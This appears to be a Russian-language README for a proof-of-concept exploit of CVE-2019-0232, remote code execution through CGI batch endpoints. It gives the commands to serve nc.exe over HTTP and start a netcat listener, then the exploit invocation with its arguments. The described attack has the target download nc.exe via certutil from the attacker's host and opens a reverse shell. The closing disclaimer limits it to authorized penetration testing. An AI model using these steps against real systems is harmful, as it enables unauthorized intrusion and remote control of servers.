
Эксплойт на основе /jaiguptanick/CVE-2019-0232
PoC для неаутентифицированного RCE через CGI batch-эндпоинты. Загружает nc.exe на цель с помощью certutil и инициирует обратный shell.
1. Разместите nc.exe (в той же директории, где находится nc.exe):
python3 -m http.server 80
2. Запустите слушатель:
nc -lvnp 1234
3. Запустите эксплойт:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| Аргумент | Обязателен | По умолчанию | Описание |
|---|---|---|---|
--url | ✅ | — | Полный URL цели с CGI-эндпоинтом |
--server-ip | ✅ | — | Ваш IP, раздающий nc.exe через HTTP |
--server-port | ❌ | 80 | Порт для HTTP-сервера |
--nc-ip | ✅ | — | Ваш IP слушателя Netcat |
--nc-port | ✅ | — | Ваш порт слушателя Netcat |
Только для авторизованного тестирования на проникновение и образовательных целей.